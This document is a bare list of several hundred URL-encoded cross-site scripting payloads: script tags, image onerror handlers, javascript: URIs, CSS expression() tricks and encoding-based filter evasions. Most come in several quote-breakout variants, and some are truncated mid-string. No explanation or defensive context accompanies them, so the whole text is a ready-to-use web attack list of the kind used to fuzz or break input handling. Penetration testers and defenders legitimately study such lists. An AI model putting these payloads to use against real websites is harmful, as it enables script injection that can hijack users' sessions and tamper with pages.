[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg("XSS") ipt>alert(1)ipt>ipt>alert(1)ipt> iPt>alert(1)IPt> test ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} 0"autofocus/onfocus=alert(1)-->"-confirm(3)-" '%3E%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//%22%3E %3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty %22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty '%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty %3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)// %22%3E%3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)// '%3E%3Chead%3E%3Cbase%20href=%22javascript://%22%3E%3C/head%3E%3Cbody%3E%3Ca%20href=%22/.%20/,javascript:alert(1)// %3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E %22%3E%3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E '%3E%3CSCRIPT%20FOR=document%20EVENT=onreadystatechange%3Ejavascript:alert(1)%3C/SCRIPT%3E %3Cb%20%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E0 %3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E %22%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E '%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=javascript:alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E %3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E %22%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E '%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=javascript:alert(1)//'%3E %3Cembed%20src=%22javascript:alert(1)%22%3E %22%3E%3Cembed%20src=%22javascript:alert(1)%22%3E '%3E%3Cembed%20src=%22javascript:alert(1)%22%3E %3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex %22%3E%3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex '%3E%3Cdiv%20style=width:1px;filter:glow%20onfilterchange=javascript:alert(1)%3Ex %3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E%22%3E %22%3E%3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3C?%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %22%3E%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %22%3E%3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3C/%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E'%3E%22%3E %22%3E%3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3C?%20foo=%22%3E%3Cx%20foo='?%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %22%3E%3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3C!%20foo=%22[[[Inception]]%22%3E%3Cx%20foo=%22]foo%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E %22%3E%3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E '%3E%3Cdiv%20id=d%3E%3Cx%20xmlns=%22%3E%3Ciframe%20onload=javascript:alert(1)%22%3E%3C/div%3E%20%3Cscript%3Ed.innerHTML=d.innerHTML%3C/script%3E %3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E %22%3E%3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E '%3E%3Cimg%20/x00src=x%20onerror=%22alert(1)%22%3E %3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x47src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x11src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x12src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg/x47src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg/x10src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg/x13src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg/x32src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg/x11src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x34src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x39src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20/x00src=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x09=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x10=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x13=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x32=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x12=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x11=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x00=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src/x47=x%20onerror=%22javascript:alert(1)%22%3E %3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x/x09onerror=%22javascript:alert(1)%22%3E %3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x/x10onerror=%22javascript:alert(1)%22%3E %3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x/x11onerror=%22javascript:alert(1)%22%3E %3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x/x12onerror=%22javascript:alert(1)%22%3E %3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x/x13onerror=%22javascript:alert(1)%22%3E %3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E %22%3E%3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E '%3E%3Cimg[a][b][c]src[d]=x[e]onerror=[f]%22alert(1)%22%3E %3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x09%22javascript:alert(1)%22%3E %3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x10%22javascript:alert(1)%22%3E %3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x11%22javascript:alert(1)%22%3E %3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x12%22javascript:alert(1)%22%3E %3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x32%22javascript:alert(1)%22%3E %3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E %22%3E%3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E '%3E%3Cimg%20src=x%20onerror=/x00%22javascript:alert(1)%22%3E %3Ca%20href=java& %22%3E%3Ca%20href=java& '%3E%3Ca%20href=java& %3Cimg%20src=%22x%60%20%60%3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3Ctitle%20onpropertychange=javascript:alert(1)%3E%3C/title%3E%3Ctitle%20title=%3E %3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E %22%3E%3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E '%3E%3C!--[if]%3E%3Cscript%3Ejavascript:alert(1)%3C/script%20--%3E %3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E %22%3E%3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E '%3E%3C!--[if%3Cimg%20src=x%20onerror=javascript:alert(1)//]%3E%20--%3E %3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url( %22%3E%3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url( '%3E%3Cobject%20id=%22x%22%20classid=%22clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598%22%3E%3C/object%3E%20%3Cobject%20classid=%22clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B%22%20onqt_error=%22javascript:alert(1)%22%20style=%22behavior:url( %3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX %22%3E%3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX '%3E%3Ca%20style=%22-o-link:'javascript:javascript:alert(1)';-o-link-source:current%22%3EX %3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E %22%3E%3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E '%3E%3Cstyle%3Ep[foo=bar%7B%7D*%7B-o-link:'javascript:javascript:alert(1)'%7D%7B%7D*%7B-o-link-source:current%7D]%7Bcolor:red%7D;%3C/style%3E %3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d %22%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d '%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(javascript:alert(1))%7d %3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E %22%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E '%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(javascript:alert(1))%7D%22;%3C/style%3E %3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3 %22%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3 '%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22javascript:alert(1);%22%3EX%3C/a%3E%3C/a%3E%3 %3Cdiv%20style=%22font-family:'foo& %22%3E%3Cdiv%20style=%22font-family:'foo& '%3E%3Cdiv%20style=%22font-family:'foo& %3C//%20style=x:expression/28javascript:alert(1)/29%3E %22%3E%3C//%20style=x:expression/28javascript:alert(1)/29%3E '%3E%3C//%20style=x:expression/28javascript:alert(1)/29%3E %3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E %22%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E '%3E%3Cstyle%3E*%7Bx:%EF%BD%85%EF%BD%98%EF%BD%90%EF%BD%92%EF%BD%85%EF%BD%93%EF%BD%93%EF%BD%89%EF%BD%8F%EF%BD%8E(javascript:alert(1))%7D%3C/style%3E %3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX %22%3E%3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX '%3E%3Cdiv%20style=%22list-style:url(http://foo.f)/20url(javascript:javascript:alert(1));%22%3EX %3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E %22%3E%3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E '%3E%3Cdiv%20id=d%3E%3Cdiv%20style=%22font-family:'sans/27/3B%20color/3Ared/3B'%22%3EX%3C/div%3E%3C/div%3E%20%3Cscript%3Ewith(document.getElementById(%22d%22))innerHTML=innerHTML%3C/script%3E %3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20 %22%3E%3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20 '%3E%3Cdiv%20id=%22x%22%3EX%3C/div%3E%20%3Cstyle%3E%20%20 %3Cx%20style=%22background:url('x& %22%3E%3Cx%20style=%22background:url('x& '%3E%3Cx%20style=%22background:url('x& %3Cscript%3E(%7Bset//$($)%7B_//setter=$,=javascript:alert(1)%7D%7D).$=eval%3C/script%3E %22%3E%3Cscript%3E(%7Bset/**/$($)%7B//setter=$,_=javascript:alert(1)%7D%7D).$=eval%3C/script%3E '%3E%3Cscript%3E(%7Bset//$($)%7B_//setter=$,=javascript:alert(1)%7D%7D).$=eval%3C/script%3E %3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E %22%3E%3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E '%3E%3Cscript%3EReferenceError.prototype.defineGetter('name',%20function()%7Bjavascript:alert(1)%7D),x%3C/script%3E %3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E %22%3E%3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E '%3E%3Cscript%3EObject.noSuchMethod%20=%20Function,[%7B%7D][0].constructor.('javascript:alert(1)')()%3C/script%3E %3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi %22%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi '%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi %3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E %22%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E '%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E %3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE %22%3E%3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE '%3E%3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE %3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url( %22%3E%3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url( '%3E%3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url( %2 %3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E %22%3E%3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E '%3E%3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E %3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22 %22%3E%3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22 '%3E%3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22 %3Cscript%3Ejavascript:alert(1)%3C/script%3E '%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E %3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E %22%3E%3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E '%3E%3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E %3CIMG%20SRC=javascript:javascript:alert(1)%3E %22%3E%3CIMG%20SRC=javascript:javascript:alert(1)%3E '%3E%3CIMG%20SRC=javascript:javascript:alert(1)%3E %3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E %22%3E%3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E '%3E%3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E %3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E %22%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E '%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E %3CBODY%20ONLOAD=javascript:alert(1)%3E %22%3E%3CBODY%20ONLOAD=javascript:alert(1)%3E '%3E%3CBODY%20ONLOAD=javascript:alert(1)%3E %3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E %22%3E%3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E '%3E%3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E %3CIMG%20SRC=%22javascript:javascript:alert(1)%22 %22%3E%3CIMG%20SRC=%22javascript:javascript:alert(1)%22 '%3E%3CIMG%20SRC=%22javascript:javascript:alert(1)%22 %3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E %22%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E '%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E %3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E %22%3E%3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E '%3E%3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E %3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E %22%3E%3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E '%3E%3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E %3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E %22%3E%3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E '%3E%3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E %3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E %22%3E%3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E '%3E%3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E %3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E %22%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E '%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E %3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX %22%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX '%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX %3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E %22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E '%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E %3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E %22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E '%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E %3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E %22%3E%3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E '%3E%3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E %3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E %22%3E%3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E '%3E%3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E %3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E %22%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E '%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E %3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E %22%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E '%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E %3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E %22%3E%3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E '%3E%3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E %3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E %22%3E%3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E '%3E%3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E %3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E 